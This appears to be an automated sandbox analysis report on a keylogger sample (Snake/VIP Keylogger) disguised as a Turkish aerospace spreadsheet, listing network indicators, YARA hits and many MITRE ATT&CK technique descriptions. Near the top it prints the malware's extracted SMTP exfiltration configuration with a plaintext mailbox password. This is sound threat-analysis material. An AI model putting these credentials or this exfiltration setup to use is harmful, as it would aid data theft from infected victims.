Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Source: Yara match	File source: 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 013FF8E9h		3_2_013FF631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 013FFD41h		3_2_013FFA88

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TEKL#U0130F #U01_4d817154e7317f6556f21a981843090bab0f495_0d25fb3a_078ba47d-8192-46dd-95c3-e9b5d776b9e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D7A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EF2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F70.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Function 00007FFB4AD82630 Relevance: 3.2, Strings: 2, Instructions: 740
COMMON

Function 00007FFB4AD83C60 Relevance: 3.0, Strings: 2, Instructions: 470
COMMON

Function 00007FFB4AD9407A Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Function 00007FFB4AD80C81 Relevance: 1.8, APIs: 1, Instructions: 334
COMMON

Function 00007FFB4AD804EA Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre